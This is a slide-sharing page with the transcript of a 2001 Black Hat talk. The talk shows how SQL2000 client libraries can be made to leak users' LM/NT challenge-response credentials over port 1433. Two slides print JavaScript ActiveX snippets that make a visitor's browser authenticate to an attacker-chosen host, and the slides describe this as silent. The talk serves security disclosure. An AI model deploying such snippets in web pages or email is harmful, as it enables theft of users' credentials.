grabbin creds forcing sql libs to deliver lm nt challenge and response on the back channel
Download
Skip this Video
Download Presentation
Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

Loading in 2 Seconds...

play fullscreen
1 / 13

Grabbin Creds: Forcing SQL libs to deliver LM - PowerPoint PPT Presentation


  • 81 Views
  • Uploaded on

Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…. Timothy M. Mullen AnchorIS.Com, Inc. [email protected] The Culprit: SQL2000 Super Sockets Lib. New functions in dbnetlib.dll! Supports TCP/IP Sockets, encryption, authentication, etc.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Grabbin Creds: Forcing SQL libs to deliver LM' - otis


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
grabbin creds forcing sql libs to deliver lm nt challenge and response on the back channel
Grabbin’ Creds:Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

Timothy M. Mullen AnchorIS.Com, Inc.

[email protected]

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

the culprit sql2000 super sockets lib
The Culprit:SQL2000 Super Sockets Lib
  • New functions in dbnetlib.dll!
  • Supports TCP/IP Sockets, encryption, authentication, etc.
  • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?)

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

backgrounders
Backgrounders…
  • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts)
  • Integrated Authentication (NTLM Creds) needed Named Pipes
  • Named Pipes required 139/445 open to authenticating system.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

backgrounders cont
Backgrounders… cont.
  • Integrated Authentication has _always_ been the recommended configuration.
  • 139/445 has long been blocked at the router (if not, you are a yum-yum.)
  • Many server-to-server apps authenticate over TCP 1433 because it is “safe” .

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

the skinny
The Skinny
  • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.
  • The LM/NTLM challenge/response pairs can now be sent out via 1433 (other other ports if changed)

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

the problem
The Problem
  • Many routers, though specifically blocking 139/445, still allow established traffic out- I.e. 1433 outbound is free to pass.
  • Many have 1433 explicitly open for application support, server-to-server queries, etc.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

the sting
The Sting
  • Client side ODBC connections can specify the target server, authentication type, and the library to use.
  • Web sites can request client to perform ADODB recordset requests, as well as other tasks.
  • HTML email as well.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

somewhat lame example
Somewhat Lame Example
  • Web site with following tag:

{

conn=new ActiveXObject("ADODB.Connection");

conn.ConnectionString=\'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib\';

conn.Open();

}

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

example cont
Example Cont…
  • User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.
  • Easily engineered around…

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

not so lame example
Not So Lame Example
  • Lets try this one:

{

ns = new ActiveXObject("SQLNS.SQLNamespace");

ns.Initialize ("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");

}

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

what s the difference
What’s the difference?
  • SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ !
  • Silently grab the creds for fun and profit!

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

live demo
Live Demo
  • Don’t try this at home! Professional driver on closed course.

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

thanks

Thanks!

AnchorIS.Com www.anchoris.com

HammerofGod www.hammerofgod.com

Timothy M. Mullen [email protected]

[email protected]

Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001

ad